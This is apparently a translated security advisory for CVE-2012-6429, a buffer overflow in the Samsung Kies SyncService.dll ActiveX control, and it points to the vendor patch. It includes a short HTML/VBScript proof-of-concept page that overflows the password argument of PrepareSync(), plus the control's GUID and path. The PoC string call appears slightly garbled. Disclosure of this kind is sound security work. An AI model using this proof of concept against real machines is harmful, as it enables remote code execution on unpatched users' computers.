Release date:
Updated on:
Affected Systems:
Samsung Kies 2.5.0.12114 _ 1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57249
Cve id: CVE-2012-6429
Samsung Kies connects your pc to your phone so that you can easily synchronize data and find new software.
The cause of the vulnerability is that the PrepareSync () method in the ActiveX control SyncService. dll does not check the input data. Remote attackers can pass any value to the "password" parameter of the PrepareSync () method to trigger an ACCESS_VIOLATION exception. This vulnerability can be exploited to successfully rewrite the EIP register and SEH records.
SyncService. dll has a GUID of {EA8A3985-F9DF-4652-A255-E4E7772AFCA8} and the default location is "C: \ Program Files \ Samsung \ Kies \ External \ DeviceModules \ SyncService. dll ".
<* Source: High-Tech Bridge Security Research Lab
Link: https://www.htbridge.com/advisory/HTB23136
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<Html>
<! -- (C) oded by High-Tech Bridge Security Research Lab -->
<Head>
<Title> Remote Buffer Overflow Vulnerability in Samsung Kies v. 2.5.0.12114 _ 1 </title>
</Head>
<Script language = 'vbscript'>
Sub PoC ()
Arg1 = "defaultV"
Arg2 = String (14356, "")
Arg3 = 1
Arg4 = 1
Target. PrepareSync arg1, arg2, arg3, arg4
End Sub
</Script>
<Body>
<H3> Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech Bridge Security Research Lab <Input language = VBScript onclick = PoC () type = button value = "Proof of Concept">
</Body>
<Object classid = 'clsid: EA8A3985-F9DF-4652-A255-E4E7772AFCA8 'id = 'target'> </object>
</Html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Samsung
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.samsung.com/kies